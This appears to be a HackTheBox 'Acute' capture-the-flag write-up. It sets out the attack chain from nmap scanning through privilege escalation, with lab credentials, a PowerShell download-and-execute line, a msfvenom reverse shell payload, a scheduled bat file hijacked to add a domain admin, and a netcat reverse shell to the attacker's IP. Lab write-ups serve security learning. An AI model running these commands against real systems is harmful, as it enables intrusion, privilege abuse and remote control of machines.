HackTheBox-Acute

NMAP

PORT    STATE SERVICE  VERSION                                         
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Issuer: commonName=acute-ATSSERVER-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-01-06T06:34:58
| Not valid after: 2030-01-04T06:34:58
| MD5: cf3a d387 8ede 75cf 89c1 8806 0b6b c823
|_SHA-1: f954 d677 0cf3 54df 3fa2 ed4f 78c3 1902 c120 a368
|_ssl-date: 2022-02-13T14:22:11+00:00; -3s from scanner time.
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -3s

PORT 443 (HTTPS)

Visiting the web server we’ll get 404 status code

Foothold

Now we don’t know what’s the username also we don’t know the name of the computer , so running exiftool on the word document

IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.56:2222/powershell-nmap.ps1')
reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=2222 -f exe > shell.exe

Privilege Escalation (imonks)

Using screenshare feature, we can see the GUI of the windows machine and there was script running which was connecting to the actual host machine with the credentials imonks:W3_4R3_th3_f0rce.

$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force$credential = New-Object System.Management.Automation.PSCredential('acute\imonks',$pass)Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { whoami } -Credential $credential
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { Get-Command } -Credential $credential

Privilege Escalation (jmorgan)

This script is using actue\jmorgan's secure password to run Get-Volume on the container that we have a web based powershell so what if we made it to execute our payload in C:\Utils which will give us a reverse shell as jmorgan

Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { (Get-Content -path C:\Users\imonks\Desktop\wm.ps1) -replace 'Get-Volume','cmd.exe /c C:\Utils\uwu.exe'  } -Credential $credential
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { ((Get-Content -path C:\Users\imonks\
Desktop\wm.ps1) -replace 'Get-Volume','cmd.exe /c C:\Utils\uwu.exe') | Set-Content -Path C:\Users\imonks\Desktop\wm.ps1
} -Credential $credential
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { C:\Users\imonks\Desktop\wm.ps1 } -Credential $credential

Privilege Escalation (awallace)

Grabbing Administrator’s and Natasha’s hash we can check if they are crackable , using crackstation we can crack the administrator's hash and get the password Password@123

REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { Set-Content "C:\Program Files\keepmeon\uwu.bat" -Value ‘net group Site_Admin "awallace" /add /domain’ } -Credential $credential
$sess = New-PSSession -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $credential
This file downloads the nc64.exe (make sure to get 1.12 as the defender removes the previous one)Invoke-Command -Session $sess -ScriptBlock { $var1 = "powershell.exe -c Invoke-WebRequest 'http://10.10.14.61:3333/nc64.exe' -OutFile 'nc64.exe' `r`n "  }
This command will be executed after nc64.exe is downloadedInvoke-Command -Session $sess -ScriptBlock { $var2 = "nc64.exe 10.10.14.61 5555 -e cmd.exe `r`n " }
This will write the values of both variables in the bat fileInvoke-Command -Session $sess -ScriptBlock { Set-Content -Path "C:\Program Files\keepmeon\uwu.bat" -Value $var1,$var2 }

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store